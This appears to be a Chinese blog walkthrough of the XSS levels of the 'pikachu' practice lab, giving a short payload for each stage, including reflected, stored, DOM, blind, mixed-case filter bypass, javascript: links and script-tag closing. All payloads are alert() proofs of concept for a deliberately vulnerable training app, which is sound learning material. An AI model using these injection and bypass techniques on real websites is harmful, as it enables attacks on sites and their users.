pikachu-XSS闯关挑战

get

复制代码
message=<script>alert("123")</script>&submit=submit

post

可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆

直接在输入框中输入

复制代码
<script>alert("123")</script>

存储型

复制代码
<script>alert("123")</script>

DOM

随意输入可以看到提示

进入源码找到提示,将标签闭合

复制代码
' onclick="alert('123')"

xss-x

同样的语句,链接点两次

盲打

在留言板输入,发现没有变化,在提示中看到登陆后台

复制代码
<script>alert("456")</script>

在后台可以看到弹窗

过滤

输入发现被过滤

大小写混合,成功

复制代码
<SCriPt>alert("123")</sCrIPt>

html

可以看到源码时链接

输入

复制代码
javascript:alert(/xss/)

href

输入上一个,点击链接即可

js输出

看到源码是一个script语句,将前面的闭合,再写一个新的弹窗

复制代码
</script><script>alert("123")</script>
相关推荐
风中芦苇啊7 小时前
从直接生成到受控配置:新一代图表Agent的SQL安全生成范式
数据库·sql·安全
泛普软件8 小时前
企业项目管理软件如何选型?统筹多项目资源把控交付与盈利水平
大数据·安全
andxe8 小时前
安科士AndXe 400G QSFP-DD LR8光模块芯片架构与品控体系解析
网络·光模块·光通信
去码头整点薯条988 小时前
网络实验报告10
网络
坚定的共产主义生产设备永不宕机8 小时前
路由协议OSPF进阶一篇讲全
网络
碎碎念_49210 小时前
以太网技术、VLAN、STP详解
网络·stp·vlan
云水一下10 小时前
DVWA从入门到精通(四):CSRF(跨站请求伪造)
安全·csrf·dvwa
tuddy78946410 小时前
Codex++ 安全边界探秘:从模型能力到风险防御
人工智能·python·安全
hbugs00110 小时前
【案例分享】全网首个华三数据中心流量可视化实验,基于EVE-NG V7平台
网络·网络协议·安全·devops·eve-ng
深盾科技_Virbox10 小时前
深盾科技·Virbox产品体系全景解读:软件安全如何从加密锁走向全生命周期
java·大数据·算法·安全·软件需求